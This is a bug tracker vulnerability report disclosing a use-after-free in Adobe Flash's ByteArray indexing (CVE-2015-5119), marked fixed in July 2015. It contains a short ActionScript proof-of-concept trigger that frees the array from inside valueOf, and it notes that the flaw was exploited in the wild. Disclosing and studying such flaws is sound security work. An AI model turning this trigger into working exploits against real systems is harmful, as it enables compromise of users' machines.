New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 2 users

Issue metadata

Status: Fixed
Email to this user bounced
Closed: Jul 2015

Sign in to add a comment

Issue 472: Adobe Flash: Use-after-free in ByteArray Operator[]

Reported by, Jul 1 2015 Project Member

Issue description

There is a use-after-free in the ByteArray operator []. If a byte array index is set to a value with valueOf defined, this method gets called. If valueOf contains code that frees the array, such as setting its length, it will lead to a use-after-free, as the original ByteArray memory gets set as opposed to the newly allocated memory. A PoC is as follows:

		for(var i = 0; i < 1000; i++){
			var b = new ByteArray();
			b.length = 12;
			var n = new myba(b);
			b[0] = n;

In the myba class definition:

		prototype.valueOf = function()
			b.length = 1000;
			bb = new ByteArray();
			bb.length = 12;
			return 77

A swf and as files are attached.

This bug is subject to a 7 day disclosure deadline, as the issue is being exploited in the wild. If 7 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
478 bytes Download
1.3 KB Download
475 bytes Download

Comment 1 by, Jul 5 2015

Labels: CVE-2015-5119

Comment 2 by, Jul 9 2015

Labels: -Restrict-View-Commit Fixed-2015-Jul-8
Status: Fixed

Sign in to add a comment